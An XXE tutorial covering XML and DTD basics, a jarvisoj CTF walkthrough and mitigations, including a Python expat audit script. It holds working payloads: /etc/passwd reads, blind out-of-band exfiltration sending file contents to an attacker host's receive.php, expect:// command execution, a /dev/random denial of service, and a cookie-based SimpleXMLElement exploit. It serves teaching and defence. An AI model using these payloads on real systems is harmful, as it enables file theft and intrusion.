
Notes on XXE vulnerabilities

1 Definition and principle

1.1 XXE definition

XXE stands for XML External Entity Injection. The vulnerability arises when an application parses XML input without prohibiting the loading of external entities, so that attacker-controlled external entities get loaded. The consequences include reading local files, scanning internal network ports, attacking internal websites, launching denial-of-service attacks and other hazards.

1.2 XML basics

1.2.1 XML definition

XML is a document markup language. An XML document consists of an XML declaration, an optional DTD (document type definition) and the document elements:

```xml
<?xml version='1.0' encoding='UTF-8' ?>
<!-- The line above is the XML declaration; it must come first in the file -->
<scores>
    <student id='s1'>
        <name>hacker</name>
        <course>C++</course>
        <score>95</score>
    </student>
</scores>
```

1.2.2 DTD definition

A DTD (Document Type Definition) specifies which elements an XML document may contain and what each element may contain, much like a type definition in a strongly typed language.

Defining an internal DTD inside the XML file:

```xml
<?xml version='1.0' encoding='UTF-8' ?>
<!-- Define an internal DTD -->
<!DOCTYPE scores [
<!ELEMENT scores (student+)>
<!ELEMENT student (name, course, score)>
<!ATTLIST student id CDATA #REQUIRED>
<!ELEMENT course (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT score (#PCDATA)>
]>
<scores>
    <student id='s1'>
        <name>hacker</name>
        <course>C++</course>
        <score>90</score>
    </student>
</scores>
```

PCDATA stands for parsed character data.

Referencing an external entity (here an external DTD file):

```xml
<?xml version='1.0' encoding='UTF-8' ?>
<!-- Reference an external DTD -->
<!DOCTYPE scores SYSTEM 'scores.dtd'>
<scores>
    <student id='s1'>
        <name>hacker</name>
        <course>C++</course>
        <score>90</score>
    </student>
</scores>
```

Content of the scores.dtd file:

```xml
<?xml version='1.0' encoding='UTF-8' ?>
<!-- The text declaration above must be the first thing in the external DTD -->
<!ELEMENT scores (student+)>
<!ELEMENT student (name, course, score)>
<!ATTLIST student id CDATA #REQUIRED>
<!ELEMENT course (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT score (#PCDATA)>
```

2 XML entity injection

A DTD can also define entities (analogous to constants in a programming language). A defined entity can be referenced from the XML body, and when the XML parser processes the document it replaces each reference with the entity's defined content.

An entity is referenced with the syntax &name; (the entity name between an ampersand and a semicolon).

Referencing an external entity is where the trouble starts. The following code references an external entity:

```xml
<?xml version='1.0'?>
<!DOCTYPE demo [
<!ENTITY content SYSTEM 'file:///etc/password'>
]>
<demo>&content;</demo>
```

So the vulnerability comes down to one property of external entities: they can load and parse files outside the document.

Parameter entities:

Parameter entities are used only within the DTD (the internal subset of the document or an external subset); the XML specification allows them to be referenced only inside the DTD. Both the declaration and the reference are marked with a percent sign: the declaration is <!ENTITY % name ...> and the reference is %name;. The reference is expanded while the DTD itself is parsed, so the replacement text becomes part of the DTD. Entities of this kind begin with the "%" character (or with the percent sign encoded in hexadecimal).

```xml
<?xml version='1.0'?>
<!DOCTYPE root [
<!ELEMENT root (message)>
<!ENTITY % param1 '<!ENTITY internal "http://xxx.com">'>
%param1;
]>
<root>
    <message>&internal;</message>
</root>
```

Parameter entities are often used in blind XXE (XXE without echo).

3 XXE hazards

3.1 Reading arbitrary files

3.1.1 With echo

Take the XXE lab environment on vulhub as an example:

[Screenshot: 20190115153320.png]

payload:

```xml
<?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE root [
<!ELEMENT name ANY>
<!ENTITY data SYSTEM 'file:///etc/passwd'>]>
<root>
<name>&data;</name>
</root>
```

3.1.2 Without echo (blind XXE)

The principle of blind XXE is simple: establish an out-of-band channel to extract the data. The URL in the external entity makes the vulnerable server issue a request, and a host on the public network controlled by the attacker receives the data, so file contents can be read even though the application echoes nothing.

The attacker sends a payload to the server with the XXE vulnerability. The payload first defines an entity that reads a local file on the server, then makes the server request a URL on the attacker's host to fetch a malicious DTD. When the vulnerable server processes that DTD, it sends the contents of the local file as a parameter to a PHP script on the attacker's host, and that script saves the received parameter locally. This is how the content is obtained without any echo.

payload:

```xml
<?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % evil SYSTEM 'file:///etc/passwd'>
<!-- Or read through the PHP filter pseudo-protocol: php://filter/read=convert.base64-encode/resource=conf.php -->
<!ENTITY % xxe SYSTEM 'http://IP/dtd.xml'>
%xxe;
%all;
]>
<foo>&send;</foo>
```

dtd.xml:

```xml
<!ENTITY % all '<!ENTITY send SYSTEM "http://IP/receive.php?p=%evil;">'>
```

In the internal DTD, a parameter entity reference may only appear at the same level as the declarations; it cannot appear directly inside a declaration. Otherwise the parser reports the error: PEReferences forbidden in internal subset.

3.2 Command execution

This requires the PHP expect extension to be installed.

```xml
<?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM 'expect://id'>]>
<xxe>
<name>&xxe;</name>
</xxe>
```

3.3 Denial of service

```xml
<?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM 'file:///dev/random'>]>
<xxe>
<name>&xxe;</name>
</xxe>
```

4 CTF challenge

http://web.jarvisoj.com:9882

Challenge description: obtain the contents of /home/ctf/flag.txt.

Open the page, click Go, and capture the request in Burp Suite:

```http
POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 36
Origin: http://web.jarvisoj.com:9882
Connection: close
Referer: http://web.jarvisoj.com:9882/

{"search":"type sth!","value":"own"}
```

Change Content-Type to application/xml and submit the PoC:

[Screenshot: 20190115160754.png]

4.1 DEMO 1

Source code:

```php
<?php
function __autoload($cls) {
    include $cls;
}
class Black {
    public function __construct($string, $default, $keyword, $store) {
        if ($string) ini_set('highlight.string', '#0d0d0d');
        if ($default) ini_set('highlight.default', '#0d0d0d');
        if ($keyword) ini_set('highlight.keyword', '#0d0d0d');
        if ($store) {
            setcookie('theme', 'Black-'.$string.'-'.$default.'-'.$keyword, 0, '/');
        }
    }
}
class Green {
    public function __construct($string, $default, $keyword, $store) {
        if ($string) ini_set('highlight.string', '#00fb00');
        if ($default) ini_set('highlight.default', '#00fb00');
        if ($keyword) ini_set('highlight.keyword', '#00fb00');
        if ($store) {
            setcookie('theme', 'Green-'.$string.'-'.$default.'-'.$keyword, 0, '/');
        }
    }
}
if ($_=@$_GET['theme']) {
    if (in_array($_, ['Black', 'Green'])) {
        if (@class_exists($_)) {
            ($string=@$_GET['string']) || $string=false;
            ($default=@$_GET['default']) || $default=false;
            ($keyword=@$_GET['keyword']) || $keyword=false;
            new $_($string, $default, $keyword, @$_GET['store']);
        }
    }
} else if ($_=@$_COOKIE['theme']) {
    // The cookie value is split on '-' and the first part is used as a class name without any whitelist check
    $args=explode('-', $_);
    if (class_exists($args[0])) {
        new $args[0]($args[1], $args[2], $args[3], '');
    }
} else if ($_=@$_GET['info']) {
    phpinfo();
}
highlight_file(__FILE__);
```

Notice that where the theme class is loaded from the cookie, the code never checks whether the cookie has been tampered with, so we can instantiate any class through new $args[0]($args[1], $args[2], $args[3], '');

Look for a built-in PHP class whose constructor parameters match $args[0]($args[1], $args[2], $args[3], ''); the class SimpleXMLElement meets this requirement.

Therefore the /flag.php file can be read through blind XXE.

payload:

```http
Cookie: theme=SimpleXMLElement-http://ip/xxe.xml-2-true
```

Remote xxe.xml:

```xml
<?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM 'php://filter/read=convert.base64-encode/resource=file:///flag'>
<!ENTITY % remote SYSTEM 'http://IP/xxe.dtd'>
%remote;
%all;
]>
<foo>&send;</foo>
```

xxe.dtd:

```xml
<!ENTITY % all '<!ENTITY send SYSTEM "http://IP/receive.php?file=%file;">'>
```

4.2 DEMO 2

Use the mechanism provided by the development language to disable external entities.

In PHP, when the libxml version is below 2.9.1, external entity loading is enabled by default:

```php
<?php
// true disables loading of external entities; false leaves it enabled.
// Newer libxml versions disable it by default, and this function is deprecated as of PHP 8.0.
libxml_disable_entity_loader(true);
?>
```

Filter user-submitted XML data for keywords such as SYSTEM and PUBLIC.
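A parser-level version of the two mitigations above (refuse external entity loading, and inspect the DTD for SYSTEM/PUBLIC and parameter-entity declarations instead of grepping for the keywords), written as an added example with Python's standard-library expat bindings; it is not code from the post or from PHP's libxml. The names audit_xml, is_safe, XXE_PAYLOAD and BENIGN and the host attacker.invalid are this example's own; the two samples are the with-echo payload from section 3.1.1 and the scores document from section 1.2.2.

```python
import xml.parsers.expat as expat

def audit_xml(data: bytes) -> dict:
    """Parse untrusted XML with expat, refusing every external resource.

    report["doctype"]: (name, system_id, public_id); report["entities"]:
    (name, is_parameter, system_id) for parameter entities and entities with a
    SYSTEM/PUBLIC id; report["blocked"]: system ids whose expansion was refused.
    """
    report = {"doctype": None, "entities": [], "blocked": [], "parse_error": None}
    p = expat.ParserCreate()
    # Never fetch external parameter entities (the %xxe; SYSTEM 'http://...' step).
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = (name, system_id, public_id)

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Internal general entities (a literal value) are harmless for XXE;
        # report parameter entities and anything with an external identifier.
        if is_param or system_id is not None or public_id is not None:
            report["entities"].append((name, bool(is_param), system_id))

    def on_external_ref(context, base, system_id, public_id):
        # Fires when &data; refers to a SYSTEM entity. Returning 0 makes expat
        # abort instead of opening file:///, http:// or expect:// resources.
        report["blocked"].append(system_id)
        return 0

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = on_external_ref
    try:
        p.Parse(data, True)
    except expat.ExpatError as exc:
        report["parse_error"] = str(exc)
    return report

def is_safe(report: dict) -> bool:
    """True only if the document declared no DTD-level external content."""
    _, dt_system, dt_public = report["doctype"] or (None, None, None)
    return dt_system is None and dt_public is None and not report["entities"]

# Constructed samples: the post's file-read payload and a benign document.
XXE_PAYLOAD = (b"<?xml version='1.0' encoding='utf-8'?>\n<!DOCTYPE root [\n"
               b"<!ELEMENT name ANY>\n<!ENTITY data SYSTEM 'file:///etc/passwd'>]>\n"
               b"<root><name>&data;</name></root>")
BENIGN = (b"<?xml version='1.0' encoding='UTF-8'?>\n<!DOCTYPE scores [\n"
          b"<!ELEMENT scores (student+)>\n<!ELEMENT student (#PCDATA)>\n]>\n"
          b"<scores><student>hacker</student></scores>")
```

Run audit_xml on the raw request body before handing it to the real parser; anything with a non-empty entities list is rejected, and the report gives the exact system id to log.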
